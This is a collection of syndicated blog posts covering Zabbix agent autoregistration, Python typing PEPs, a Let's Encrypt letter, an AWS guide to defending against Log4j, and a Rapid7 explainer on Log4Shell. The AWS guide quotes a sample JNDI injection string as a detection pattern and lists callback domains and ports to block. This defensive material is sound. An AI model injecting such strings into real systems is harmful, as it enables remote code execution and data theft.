Handy Tips #16: Automating Zabbix host deployment with autoregistration

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/handy-tips-16-automating-zabbix-host-deployment-with-autoregistration/18232/

Configure Zabbix agent autoregistration to automatically deploy and start monitoring Zabbix agent hosts.

As your IT infrastructure scales up, there comes a point where manual host creation is simply not feasible. At this point, the preferable approach is to find a way to automate host deployment.

Deploy and manage hosts automatically with Zabbix active agent autoregistration:

  • Automatically deploy and start monitoring hosts
  • Assign different templates depending on hostname and host metadata

  • Receive notifications whenever a new host is deployed
  • Automatically make changes or perform offboarding of hosts

Check out the video to learn how to configure Zabbix agent autoregistration.

How to configure Zabbix agent autoregistration:

 

  1. Navigate to Configuration → Actions → Autoregistration actions
  2. Click the Create action button
  3. Define action conditions
  4. Navigate to the Operations tab and define the action operations
  5. Connect to your host and open the Zabbix agent configuration file
  6. Populate the Hostname, HostMetadata and HostInterface fields
  7. Restart the Zabbix agent
  8. Navigate to Configuration → Hosts and make sure that the host has been created
  9. Navigate to Monitoring → Latest Data and make sure that the host is receiving metrics

Tips and best practices:
  • Host name and host metadata values are case-sensitive
  • Agent restart is required to apply host name and host metadata changes
  • HostnameItem can be used to populate the host name with a Zabbix agent item value
  • HostMetadataItem can be used to populate the host metadata with a Zabbix agent item value

[$] Wrangling the typing PEPs

Post Syndicated from original https://lwn.net/Articles/878675/rss

When last we looked in on the great typing PEP
debate
for Python, back in August, two PEPs were still being
discussed as alternatives for handling annotations in the language.
The steering council was considering the issue after deferring on a
decision for the Python 3.10 release, but the question has been
deferred again for Python 3.11. More study is needed and the council
is looking for help from the Python community to guide its
decision. In the meantime, though, discussion about the deferral has led
to the understanding that annotations are not a general-purpose feature,
but are only meant for typing information. In addition, there is a growing
realization that typing information is effectively becoming mandatory
for Python libraries.

A Year-End Letter from our Executive Director

Post Syndicated from Let's Encrypt original https://letsencrypt.org/2021/12/16/ed-letter-2021.html

This letter was originally published in our 2021 annual report.

We can do a lot to improve security and privacy on the Internet by taking existing ideas and applying them in ways that benefit the general public at scale. Our work certainly does involve some research, as our name implies, but the success that we’ve had in pursuing our mission largely comes from our ability to go from ideas to implementations that improve the lives of billions of people around the world.

Our first major project, Let’s Encrypt, now helps to protect more than 260 million websites by offering free and fully automated TLS certificate issuance and management. Since it launched in 2015, encrypted page loads have gone from under 40% to 92% in the U.S. and 83% globally.

We didn’t invent certificate authorities. We didn’t invent automated issuance and management. We refined those ideas and applied them in ways that benefit the general public at scale.

We launched our Prossimo project in late 2020. Our hope is that this project will greatly improve security and privacy on the Internet by making memory safety vulnerabilities in the Internet’s most critical a thing of the past. We’re bringing a healthy dose of ambition to the table and we’re backing it up with effective strategies and strong partnerships.

Again, we didn’t invent any memory safe languages or techniques, and we certainly didn’t invent memory safety itself. We’re simply taking existing ideas and applying them in ways that benefit the general public at scale. We’re getting the work done.

With our latest project, Divvi Up for Privacy Preserving Metrics (PPM), the core ideas are a bit newer than the ideas behind our other projects, but we didn’t invent them either. Over the past decade or so some bright people have come up with a way to resolve the tension between wanting to collect metrics about populations and needing to collect data about individuals.

We believe those ideas have matured enough that it’s time to deploy them to the public’s benefit. We started by building and deploying a PPM service for Covid-19 Exposure Notification applications in late 2020, in partnership with Apple, Google, the Bill & Melinda Gates Foundation and the Linux Foundation. We’re expanding that service so any application can collect metrics in a privacy-preserving way.

Being ready to bring ideas to life means a few different things.

We need to have an excellent engineering team that knows how to build services at scale. It’s not enough to just build something that works – the quality and reliability of our work needs to inspire confidence. People need to be able to rely on us.

We also need to have the experience, perspective, and capacity to effectively consider ideas. We are not an organization that “throws things at the wall to see what sticks.” Between our staff, our board of directors, our partners, and our community, we’re able to do a great job evaluating opportunities to understand technical feasibility, potential impact, and alignment with our public benefit mission—to reduce financial, technological, and educational barriers to secure communication over the Internet.

Administrative and communications capabilities are essential. From fundraising and accounting to legal and social media, our administrative teams exist in order to support and amplify the critical work that we do. We’re proud to run a financially efficient organization that provides services for billions of people on only a few million dollars each year.

Finally, it means having the financial resources we need to function. As a nonprofit, 100% of our funding comes from charitable contributions from people like you and organizations around the world. But global impact doesn’t necessarily require million dollar checks: since 2015 tens of thousands of people have given to our work. They’ve made a case for corporate sponsorship, given through their DAFs, or set up recurring donations, sometimes to give $3 a month. That’s all added up to $17M that we’ve used to change the Internet for nearly everyone using it. I hope you’ll join these people and support us financially if you can.

Using AWS security services to protect against, detect, and respond to the Log4j vulnerability

Post Syndicated from Marshall Jones original https://aws.amazon.com/blogs/security/using-aws-security-services-to-protect-against-detect-and-respond-to-the-log4j-vulnerability/

January 7, 2022: The blog post has been updated to include using Network ACL rules to block potential log4j-related outbound traffic.

January 4, 2022: The blog post has been updated to suggest using WAF rules when correct HTTP Host Header FQDN value is not provided in the request.

December 31, 2021: We made a minor update to the second paragraph in the Amazon Route 53 Resolver DNS Firewall section.

December 29, 2021: A paragraph under the Detect section has been added to provide guidance on validating if log4j exists in an environment.

December 23, 2021: The GuardDuty section has been updated to describe new threat labels added to specific finding to give log4j context.

December 21, 2021: The post includes more info about Route 53 Resolver DNS query logging.

December 20, 2021: The post has been updated to include Amazon Route 53 Resolver DNS Firewall info.

December 17, 2021: The post has been updated to include using Athena to query VPC flow logs.

December 16, 2021: The Respond section of the post has been updated to include IMDSv2 and container mitigation info.

This blog post was first published on December 15, 2021.


Overview

In this post we will provide guidance to help customers who are responding to the recently disclosed log4j vulnerability. This covers what you can do to limit the risk of the vulnerability, how you can try to identify if you are susceptible to the issue, and then what you can do to update your infrastructure with the appropriate patches.

The log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base score of 10.0) in the ubiquitous logging platform Apache Log4j. This vulnerability allows an attacker to perform a remote code execution on the vulnerable platform. Version 2 of log4j, between versions 2.0-beta-9 and 2.15.0, is affected.

The vulnerability uses the Java Naming and Directory Interface (JNDI) which is used by a Java program to find data, typically through a directory, commonly a LDAP directory in the case of this vulnerability.

Figure 1, below, highlights the log4j JNDI attack flow.

Figure 1. Log4j attack progression

Figure 1. Log4j attack progression. Source: GovCERT.ch, the Computer Emergency Response Team (GovCERT) of the Swiss government

As an immediate response, follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Protect

You can use multiple AWS services to help limit your risk/exposure from the log4j vulnerability. You can build a layered control approach, and/or pick and choose the controls identified below to help limit your exposure.

AWS WAF

Use AWS Web Application Firewall, following AWS Managed Rules for AWS WAF, to help protect your Amazon CloudFront distribution, Amazon API Gateway REST API, Application Load Balancer, or AWS AppSync GraphQL API resources.

  • AWSManagedRulesKnownBadInputsRuleSet esp. the Log4JRCE rule which helps inspects the request for the presence of the Log4j vulnerability. Example patterns include ${jndi:ldap://example.com/}.
  • AWSManagedRulesAnonymousIpList esp. the AnonymousIPList rule which helps inspect IP addresses of sources known to anonymize client information.
  • AWSManagedRulesCommonRuleSet, esp. the SizeRestrictions_BODY rule to verify that the request body size is at most 8 KB (8,192 bytes).

You should also consider implementing WAF rules that deny access, if the correct HTTP Host Header FQDN value is not provided in the request. This can help reduce the likelihood of scanners that are scanning the internet IP address space from reaching your resources protected by WAF via a request with an incorrect Host Header, like an IP address instead of an FQDN. It’s also possible to use custom Application Load Balancer listener rules to achieve this.

If you’re using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions.

Have multiple accounts? Follow these instructions to use AWS Firewall Manager to deploy AWS WAF rules centrally across your AWS organization.

Amazon Route 53 Resolver DNS Firewall

You can use Route 53 Resolver DNS Firewall, following AWS Managed Domain Lists, to help proactively protect resources with outbound public DNS resolution. We recommend associating Route 53 Resolver DNS Firewall with a rule configured to block domains on the AWSManagedDomainsMalwareDomainList, which has been updated in all supported AWS regions with domains identified as hosting malware used in conjunction with the log4j vulnerability. AWS will continue to deliver domain updates for Route 53 Resolver DNS Firewall through this list.

Also, you should consider blocking outbound port 53 to prevent the use of external untrusted DNS servers. This helps force all DNS queries through DNS Firewall and ensures DNS traffic is visible for GuardDuty inspection. Using DNS Firewall to block DNS resolution of certain country code top-level domains (ccTLD) that your VPC resources have no legitimate reason to connect out to, may also help. Examples of ccTLDs you may want to block may be included in the known log4j callback domains IOCs.

We also recommend that you enable DNS query logging, which allows you to identify and audit potentially impacted resources within your VPC, by inspecting the DNS logs for the presence of blocked outbound queries due to the log4j vulnerability, or to other known malicious destinations. DNS query logging is also useful in helping identify EC2 instances vulnerable to log4j that are responding to active log4j scans, which may be originating from malicious actors or from legitimate security researchers. In either case, instances responding to these scans potentially have the log4j vulnerability and should be addressed. GreyNoise is monitoring for log4j scans and sharing the callback domains here. Some notable domains customers may want to examine log activity for, but not necessarily block, are: *interact.sh, *leakix.net, *canarytokens.com, *dnslog.cn, *.dnsbin.net, and *cyberwar.nl. It is very likely that instances resolving these domains are vulnerable to log4j.

AWS Network Firewall

Customers can use Suricata-compatible IDS/IPS rules in AWS Network Firewall to deploy network-based detection and protection. While Suricata doesn’t have a protocol detector for LDAP, it is possible to detect these LDAP calls with Suricata. Open-source Suricata rules addressing Log4j are available from corelight, NCC Group, from ET Labs, and from CrowdStrike. These rules can help identify scanning, as well as post exploitation of the log4j vulnerability. Because there is a large amount of benign scanning happening now, we recommend customers focus their time first on potential post-exploitation activities, such as outbound LDAP traffic from their VPC to untrusted internet destinations.

We also recommend customers consider implementing outbound port/protocol enforcement rules that monitor or prevent instances of protocols like LDAP from using non-standard LDAP ports such as 53, 80, 123, and 443. Monitoring or preventing usage of port 1389 outbound may be particularly helpful in identifying systems that have been triggered by internet scanners to make command and control calls outbound. We also recommend that systems without a legitimate business need to initiate network calls out to the internet not be given that ability by default. Outbound network traffic filtering and monitoring is not only very helpful with log4j, but with identifying other classes of vulnerabilities too.

Network Access Control Lists

Customers may be able to use Network Access Control List rules (NACLs) to block some of the known log4j-related outbound ports to help limit further compromise of successfully exploited systems. We recommend customers consider blocking ports 1389, 1388, 1234, 12344, 9999, 8085, 1343 outbound. As NACLs block traffic at the subnet level, careful consideration should be given to ensure any new rules do not block legitimate communications using these outbound ports across internal subnets. Blocking ports 389 and 88 outbound can also be helpful in mitigating log4j, but those ports are commonly used for legitimate applications, especially in a Windows Active Directory environment. See the VPC flow logs section below to get details on how you can validate any ports being considered.

Use IMDSv2

Through the early days of the log4j vulnerability researchers have noted that, once a host has been compromised with the initial JDNI vulnerability, attackers sometimes try to harvest credentials from the host and send those out via some mechanism such as LDAP, HTTP, or DNS lookups. We recommend customers use IAM roles instead of long-term access keys, and not store sensitive information such as credentials in environment variables. Customers can also leverage AWS Secrets Manager to store and automatically rotate database credentials instead of storing long-term database credentials in a host’s environment variables. See prescriptive guidance here and here on how to implement Secrets Manager in your environment.

To help guard against such attacks in AWS when EC2 Roles may be in use — and to help keep all IMDS data private for that matter — customers should consider requiring the use of Instance MetaData Service version 2 (IMDSv2). Since IMDSv2 is enabled by default, you can require its use by disabling IMDSv1 (which is also enabled by default). With IMDSv2, requests are protected by an initial interaction in which the calling process must first obtain a session token with an HTTP PUT, and subsequent requests must contain the token in an HTTP header. This makes it much more difficult for attackers to harvest credentials or any other data from the IMDS. For more information about using IMDSv2, please refer to this blog and documentation. While all recent AWS SDKs and tools support IMDSv2, as with any potentially non-backwards compatible change, test this change on representative systems before deploying it broadly.

Detect

This post has covered how to potentially limit the ability to exploit this vulnerability. Next, we’ll shift our focus to which AWS services can help to detect whether this vulnerability exists in your environment.

Figure 2. Log4j finding in the Inspector console

Figure 2. Log4j finding in the Inspector console

Amazon Inspector

As shown in Figure 2, the Amazon Inspector team has created coverage for identifying the existence of this vulnerability in your Amazon EC2 instances and Amazon Elastic Container Registry Images (Amazon ECR). With the new Amazon Inspector, scanning is automated and continual. Continual scanning is driven by events such as new software packages, new instances, and new common vulnerability and exposure (CVEs) being published.

For example, once the Inspector team added support for the log4j vulnerability (CVE-2021-44228 & CVE-2021-45046), Inspector immediately began looking for this vulnerability for all supported AWS Systems Manager managed instances where Log4j was installed via OS package managers and where this package was present in Maven-compatible Amazon ECR container images. If this vulnerability is present, findings will begin appearing without any manual action. If you are using Inspector Classic, you will need to ensure you are running an assessment against all of your Amazon EC2 instances. You can follow this documentation to ensure you are creating an assessment target for all of your Amazon EC2 instances. Here are further details on container scanning updates in Amazon ECR private registries.

GuardDuty

In addition to finding the presence of this vulnerability through Inspector, the Amazon GuardDuty team has also begun adding indicators of compromise associated with exploiting the Log4j vulnerability, and will continue to do so. GuardDuty will monitor for attempts to reach known-bad IP addresses or DNS entries, and can also find post-exploit activity through anomaly-based behavioral findings. For example, if an Amazon EC2 instance starts communicating on unusual ports, GuardDuty would detect this activity and create the finding Behavior:EC2/NetworkPortUnusual. This activity is not limited to the NetworkPortUnusual finding, though. GuardDuty has a number of different findings associated with post exploit activity, such as credential compromise, that might be seen in response to a compromised AWS resource. For a list of GuardDuty findings, please refer to this GuardDuty documentation.

To further help you identify and prioritize issues related to CVE-2021-44228 and CVE-2021-45046, the GuardDuty team has added threat labels to the finding detail for the following finding types:

Backdoor:EC2/C&CActivity.B
If the IP queried is Log4j-related, then fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Backdoor:EC2/C&CActivity.B!DNS
If the domain name queried is Log4j-related, then the fields of the associated finding will include the following values:

  • service.additionalInfo.threatListName = Amazon
  • service.additionalInfo.threatName = Log4j Related

Behavior:EC2/NetworkPortUnusual
If the EC2 instance communicated on port 389 or port 1389, then the associated finding severity will be modified to High, and the finding fields will include the following value:

  • service.additionalInfo.context = Possible Log4j callback
Figure 3. GuardDuty finding with log4j threat labels

Figure 3. GuardDuty finding with log4j threat labels

Security Hub

Many customers today also use AWS Security Hub with Inspector and GuardDuty to aggregate alerts and enable automatic remediation and response. In the short term, we recommend that you use Security Hub to set up alerting through AWS Chatbot, Amazon Simple Notification Service, or a ticketing system for visibility when Inspector finds this vulnerability in your environment. In the long term, we recommend you use Security Hub to enable automatic remediation and response for security alerts when appropriate. Here are ideas on how to setup automatic remediation and response with Security Hub.

VPC flow logs

Customers can use Athena or CloudWatch Logs Insights queries against their VPC flow logs to help identify VPC resources associated with log4j post exploitation outbound network activity. Version 5 of VPC flow logs is particularly useful, because it includes the “flow-direction” field. We recommend customers start by paying special attention to outbound network calls using destination port 1389 since outbound usage of that port is less common in legitimate applications. Customers should also investigate outbound network calls using destination ports 1388, 1234, 12344, 9999, 8085, 1343, 389, and 88 to untrusted internet destination IP addresses. Free-tier IP reputation services, such as VirusTotal, GreyNoise, NOC.org, and ipinfo.io, can provide helpful insights related to public IP addresses found in the logged activity.

Note: If you have a Microsoft Active Directory environment in the captured VPC flow logs being queried, you might see false positives due to its use of port 389.

Validation with open-source tools

With the evolving nature of the different log4j vulnerabilities, it’s important to validate that upgrades, patches, and mitigations in your environment are indeed working to mitigate potential exploitation of the log4j vulnerability. You can use open-source tools, such as aws_public_ips, to get a list of all your current public IP addresses for an AWS Account, and then actively scan those IPs with log4j-scan using a DNS Canary Token to get notification of which systems still have the log4j vulnerability and can be exploited. We recommend that you run this scan periodically over the next few weeks to validate that any mitigations are still in place, and no new systems are vulnerable to the log4j issue.

Respond

The first two sections have discussed ways to help prevent potential exploitation attempts, and how to detect the presence of the vulnerability and potential exploitation attempts. In this section, we will focus on steps that you can take to mitigate this vulnerability. As we noted in the overview, the immediate response recommended is to follow this blog and use the tool designed to hotpatch a running JVM using any log4j 2.0+. Steve Schmidt, Chief Information Security Officer for AWS, also discussed this hotpatch.

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately

Figure 4. Systems Manager Patch Manager patch baseline approving critical patches immediately

AWS Patch Manager

If you use AWS Systems Manager Patch Manager, and you have critical patches set to install immediately in your patch baseline, your EC2 instances will already have the patch. It is important to note that you’re not done at this point. Next, you will need to update the class path wherever the library is used in your application code, to ensure you are using the most up-to-date version. You can use AWS Patch Manager to patch managed nodes in a hybrid environment. See here for further implementation details.

Container mitigation

To install the hotpatch noted in the overview onto EKS cluster worker nodes AWS has developed an RPM that performs a JVM-level hotpatch which disables JNDI lookups from the log4j2 library. The Apache Log4j2 node agent is an open-source project built by the Kubernetes team at AWS. To learn more about how to install this node agent, please visit the this Github page.

Once identified, ECR container images will need to be updated to use the patched log4j version. Downstream, you will need to ensure that any containers built with a vulnerable ECR container image are updated to use the new image as soon as possible. This can vary depending on the service you are using to deploy these images. For example, if you are using Amazon Elastic Container Service (Amazon ECS), you might want to update the service to force a new deployment, which will pull down the image using the new log4j version. Check the documentation that supports the method you use to deploy containers.

If you’re running Java-based applications on Windows containers, follow Microsoft’s guidance here.

We recommend you vend new application credentials and revoke existing credentials immediately after patching.

Mitigation strategies if you can’t upgrade

In case you either can’t upgrade to a patched version, which disables access to JDNI by default, or if you are still determining your strategy for how you are going to patch your environment, you can mitigate this vulnerability by changing your log4j configuration. To implement this mitigation in releases >=2.10, you will need to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

For a more comprehensive list about mitigation steps for specific versions, refer to the Apache website.

Conclusion

In this blog post, we outlined key AWS security services that enable you to adopt a layered approach to help protect against, detect, and respond to your risk from the log4j vulnerability. We urge you to continue to monitor our security bulletins; we will continue updating our bulletins with our remediation efforts for our side of the shared-responsibility model.

Given the criticality of this vulnerability, we urge you to pay close attention to the vulnerability, and appropriately prioritize implementing the controls highlighted in this blog.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Syed Shareef

Syed is a Senior Security Solutions Architect at AWS. He works with large financial institutions to help them achieve their business goals with AWS, whilst being compliant with regulatory and security requirements.

The Everyperson’s Guide to Log4Shell (CVE-2021-44228)

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/

The Everyperson’s Guide to Log4Shell (CVE-2021-44228)

If you work in security, the chances are that you have spent the last several days urgently responding to the Log4Shell vulnerability (CVE-2021-44228), investigating where you have instances of Log4j in your environment, and questioning your vendors about their response. You have likely already read up on the implications and steps that need to be taken. This blog is for everyone else who wants to understand what’s going on and why the internet seems to be on fire again. And for you security professionals, we’ve also included some questions on the broader implications and long term view. You know, for all that spare time you have right now.

What is Log4Shell?

Log4Shell — also known as CVE-2021-44228 — is a critical vulnerability that enables remote code execution in systems using the Apache Foundation’s Log4j, which is an open-source Java library that is extensively used in commercial and open-source software products and utilities. For a more in-depth technical assessment of Log4Shell check out Rapid7’s AttackerKB analysis.

What is Log4j?

Log4j is one of the most common tools for sending text to be stored in log files and/or databases. It is used in millions of applications and websites in every organization all across the internet. For example, information is sent to keep track of website visitors, note when warnings or errors occur in processing, and help support teams’ triage problems.

Get answers to your Log4Shell questions from our experts

Sign up for our webinar on Thursday, December 16

So what’s the problem?

It turns out that Log4j doesn’t just log plain strings. Text strings that are formatted a certain way will be executed just like a line from a computer program. The problem is that this allows malicious actors to manipulate computers all over the internet into taking actions without the computer owners’ wishes or permission. Cyberattacks can use this to steal information, force actions, or extort the computer owners or operators.

This vulnerability is what we’re referring to as Log4Shell, or CVE-2021-44228. Log4j is the vulnerable technology. As this is a highly evolving situation, you can always head over to our main live blog on Log4Shell.

Is it really that big of a deal?

In a word, yes.

Caitlin Kiska, an information security engineer at Cardinal Health, put it this way: “Imagine there is a specific kind of bolt used in most of the cars and car parts in the world, and they just said that bolt needs to be replaced.” Glenn Thorpe, Rapid7’s Emergent Threat Response Manager added, “… and the presence of that bolt allows anyone to just take over the car.”

The first issue is Log4j’s widespread use. This little tool is used in countless systems across the internet, which makes remediation or mitigation of this into a huge task — and makes it more likely something might get missed.

The second issue is that attackers can use it in a variety of ways, so the sky is sort of the limit for them.

Perhaps the biggest concern of all is that it’s actually pretty easy to use the vulnerability for malicious purposes. Remote code execution vulnerabilities are always concerning, but you hope that they will be complicated to exploit and require specialist technical skill, limiting who can take advantage of them and slowing down the pace of attacks so that defenders can ideally take remediation action first. That’s not the case with Log4Shell. The Log4j tool is designed to send whatever data is inputted in the right format, so as long as attackers know how to form their commands into that format (which is not a secret), they can take advantage of this bug, and they currently are doing just that.

That sounds pretty bad. Is the situation hopeless?

Definitely not. The good news is that the Apache Foundation has updated Log4j to address the vulnerability. All organizations urgently need to check for the presence of this vulnerability in their environment and update affected systems to the latest patched version.

The first update — version 2.15.0 — was released on December 6, 2021. As exploitation ramped up in the wild, it became clear that the update did not fully remediate the issue in all use cases, a vulnerability that the National Vulnerability Database (NVD) codified as CVE-2021-45046.

As a result, on December 13, the Apache Foundation released version 2.16.0, which completely removes support for message lookup patterns, thus slamming the door on JNDI functionality completely and possibly adding to development team backlogs to update material sections on their codebase that handle logging.

That sounds straightforward, right?

Unfortunately, it’s likely going to be a pretty huge undertaking and likely require different phases of discovery and remediation/mitigation.

Remediation

The first course of action is to identify all vulnerable applications, which can be a mix of vendor-supplied solutions and in-house developed applications. NCSC NL is maintaining a list of impacted software, but organizations are encouraged to monitor vendor advisories and releases directly for the most up-to-date information.

For in-house developed applications, organizations — at a minimum — need to update their Log4j libraries to the latest version (which, as of 2021-12-14, is 2.16) and apply the mitigations described in Rapid7’s initial blog post on CVE-2021-44228, which includes adding a parameter to all Java startup scripts and strongly encourages updating Java virtual machine installations to the latest, safest versions. An additional resource, published by the Apache Security Team, provides a curated list of all affected Apache projects, which can be helpful to expedite identification and discovery.

If teams are performing “remote” checks (i.e., exploiting the vulnerability remotely as an attacker would) versus local filesystems “authenticated” checks, the remote checks should be both by IP address and by fully qualified domain name/virtual host name, as there may be different routing rules in play that scanning by IP address alone will not catch.

These mitigations must happen everywhere there is a vulnerable instance of Log4j. Do not assume that the issue applies only to internet-facing systems or live-running systems. There may be batch jobs that run hourly, daily, weekly, monthly, etc., on stored data that may contain exploit strings that could trigger execution.

Forensics

Attacks have been active since at least December 1, 2021, and there is evidence this weakness has been known about since at least March of 2021. Therefore, it is quite prudent to adopt an “assume breach” mindset. NCSC NL has a great resource page on ways you can detect exploitation attempts from application log files. Please be aware that this is not just a web-based attack. Initial, quite public, exploit showcases included changing the name of iOS devices and Tesla cars. Both those companies regularly pull metadata from their respective devices, and it seems those strings were passed to Log4j handlers somewhere in the processing chain. You should review logs from all internet-facing systems, as well as anywhere Log4j processing occurs.

Exploitation attempts will generally rely on pulling external resources in (as is the case with any attack after gaining initial access), so behavioral detections may have already caught or stopped some attacks. The Log4j weakness allows for rather clever data exfiltration paths, especially DNS. Attackers are pulling values from environment variables and files with known filesystems paths and creating dynamic domain names from them. That means organizations should review DNS query logs going as far back as possible. Note: This could take quite a bit of time and effort, but it must be done to ensure you’re not already a victim.

Proactive response

Out of an abundance of caution, organizations should also consider re-numbering critical IP segments (where Log4j lived), changing host names on critical systems (where Log4j lived), and resetting credentials — especially those associated with Amazon AWS and other cloud providers — in the event they have already been exfiltrated.

Who should be paying attention to this?

Pretty much every organization, regardless of size, sector, or geography. If you have any kind of web presence or internet connectivity, you need to pay attention and check your status. If you outsource all the technical aspects of your business, ask your vendors what they are doing about this issue.

Who is exploiting it and how?

Kind of… everyone.

“Benign” researchers (some independent, some part of cybersecurity firms) are using the exploit to gain an initial understanding of the base internet-facing attack surface.

Cyberattackers are also very active and are racing to take advantage of this vulnerability before organizations can get their patches in place. Botnets, such as Mirai, have been adapted to use the exploit code to both exfiltrate sensitive data and gain initial access to systems (some deep within organizations).

Ransomware groups have already sprung into action and weaponized the Log4j weakness to compromise organizations. Rapid7’s Project Heisenberg is collecting and publishing samples of all the unique attempts seen since December 11, 2021.

How are things likely to develop?

These initial campaigns are only the beginning. Sophisticated attacks from more serious and capable groups will appear over the coming days, weeks, and months, and they’ll likely focus on more enterprise-grade software that is known to be vulnerable.

Most of the initial attack attempts are via website-focused injection points (input fields, search boxes, headers, etc.). There will be more advanced campaigns that hit API endpoints (even “hidden” APIs that are part of company mobile apps) and try to find sneaky ways to get exploit strings past gate guards (like the iOS device renaming example).

Even organizations that have remediated deployed applications might miss some virtual machine or container images that get spun up regularly or infrequently. The Log4Shell attacks are easily automatable, and we’ll be seeing them as regularly as we see WannaCry and Conficker (yes, we still see quite a few exploits on the regular for those vulnerabilities).

Do we need to worry about similar vulnerabilities in other systems?

In the immediate term, security teams should narrow their attention to identify systems with the affected Log4j packages.

For the longer term, while it is impossible to forecast identification of similar vulnerabilities, we do know the ease and prevalence of CVE-2021-44228 demands the continued attention (been a long weekend for many) of security, infrastructure, and application teams.

Along with Log4Shell, we also have CVE-2021-4104 — reported on December 9, 2021 —  a flaw in the Java logging library Apache Log4j in version 1.x. JMSAppender that is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker’s JMS Broker. Note this flaw only affects applications that are specifically configured to use JMSAppender, which is not the default, or when the attacker has write-access to the Log4j configuration for adding JMSAppender to the attacker’s JMS Broker.

Exploit vectors of Log4Shell and mitigations reported on Friday continue to evolve as reported by our partners at Snyk.io and Java Champion, Brian Vermeer — see “Editor’s note (Dec. 13, 2021)” — therefore, continued vigilance on this near and present threat is time well spent. Postmortem exercises (and there will be many) should absolutely include efforts to evolve software, open-source, and package dependency inventories and, given current impacts, better model threats from packages with similar uninspected lookup behavior.

Does this issue indicate that we should stop compiling systems and go back to building from scratch?

There definitely has been chatter regarding the reliance upon so many third-party dependencies in all areas of software development. We’ve seen many attempts at poisoning numerous ecosystems this year, everything from Python to JavaScript, and now we have a critical vulnerability in a near-ubiquitous component.

On one hand, there is merit in relying solely on code you develop in-house, built on the core features in your programming language of choice. You can make an argument that this would make attackers’ lives harder and reduce the bang they get for their buck.

However, it seems a bit daft to fully forego the volumes of pre-built, feature-rich, and highly useful components. And let’s not forget that not all software is created equally. The ideal is that community built and shared software will benefit from many more hands to the pump, more critical eyes, and a longer period to mature.

The lesson from the Log4Shell weakness seems pretty clear: Use, but verify, and support! Libraries such as Log4j benefit from wide community adoption, since they gain great features that can be harnessed quickly and effectively. However, you cannot just assume that all is and will be well in any given ecosystem, and you absolutely need to be part of the community vetting change and feature requests. If more eyes were on the initial request to add this fairly crazy feature (dynamic message execution) and more security-savvy folks were in the approval stream, you would very likely not be reading this post right now (and it’d be one of the most boring Marvel “What If…?” episodes ever).

Organizations should pull up a seat to the table, offer code creation and review support, and consider funding projects that become foundational or ubiquitous components in your application development environment.

How would a Software Bill of Materials (SBOM) have impacted this issue?

A Bill of Materials is an inventory, by definition, and conceptually should contribute to speeding the discovery timeline during emergent vulnerability response exercises, such as the Log4j incident we are communally involved in now.

An SBOM is intended to be a formal record that contains the details and supply chain relationships of various components used in software, kind of like an ingredients list for technology. In this case, those components would include java libraries used for logging (e.g. Log4j2).

SBOM requirements were included in the US Executive Order issued in May 2021. While there may be international variations, the concept and intended objects are uniform. For that reason, I will reference US progress for simplicity.

From: The Minimum Elements For a Software Bill of Materials (SBOM), issued Department of Commerce, in coordination with the National Telecommunications and Information Administration (NTIA), Jul 12, 2021

The Everyperson’s Guide to Log4Shell (CVE-2021-44228)

The question many Log4Shell responders — including CISOs, developers, engineers, sys admins, clients, and customers — are still grappling with is simply where affected versions of Log4j are in use within their technical ecosystems. Maintaining accurate inventories of assets has become increasingly challenging as our technical environments have become more complicated, interconnected, and wide-reaching. Our ever-growing reliance on internet-connected technologies, and the rise of shadow IT only make this problem worse.

Vulnerabilities in tools like Log4j, which is used broadly in a vast array of technologies and systems, highlight the need for more transparency and automation for asset and inventory management. Perhaps the longer-term substantive impact from Log4Shell will be to refocus investments and appreciation for the cruciality of an accurate inventory of software and associated components through an SBOM that can easily be queried and linked to dependencies.

The bottom line is that if we had lived in a timeline where SBOMs were required and in place for all software projects, identifying impacted products, devices, and ecosystems would have been much easier than it has been for Log4Shell and remediation would likely be faster and more effective.

How does Log4Shell impact my regulatory status — do I need to take special action to ensure compliance?

According to Rapid7’s resident policy and compliance expert, Harley Geiger, “Regulators may not have seen Log4Shell coming, but now that the vulnerability has been discovered, there will be an expectation that regulated companies address it. As organizations’ security programs address this widespread and serious vulnerability, those actions should be aligned with compliance requirements and reporting. For many regulated companies, the discovery of Log4Shell triggers a need to re-assess the company’s risks, the effectiveness of their safeguards to protect sensitive systems and information (including patching to the latest version), and the readiness of their incident response processes to address potential log4j exploitation. Many regulations also require these obligations to be passed on to service providers. If a Log4j exploitation results in a significant business disruption or breach of personal information, regulations may require the company to issue an incident report or breach notification.”

We also asked Harley whether we’re likely to see a public policy response. Here’s what he said…

“On a federal policy level, organizations should expect a renewed push for adoption of SBOM to help identify the presence of Log4j (and other vulnerabilities) in products and environments going forward. CISA has also required federal agencies to expedite mitigation of Log4j and has ramped up information sharing related to the vulnerability. This may add wind to the sails of cyber incident reporting legislation that is circulating in Congress at present.”

How do we know about all of this?

Well, a bunch of kids started wreaking havoc with Minecraft servers, and things just went downhill from there. While there is some truth to that, the reality is that an issue was filed on the Log4j project in late November 2021. Proof-of-concept code was released in early December, and active attacks started shortly thereafter. Some cybersecurity vendors have evidence of preliminary attacks starting on December 1, 2021.

Anyone monitoring the issue discussions (something both developers, defenders, and attackers do on the regular) would have noticed the gaping hole this “feature” created.

How long has it been around?

There is evidence of a request for this functionality to be added dating back to 2013. A talk at Black Hat USA 2016 mentioned several JNDI injection remote code execution vectors in general but did not point to Log4j directly.

Some proof-of-concept code targeting the JNDI lookup weakness in Log4j 2.x was also discovered back in March of 2021.

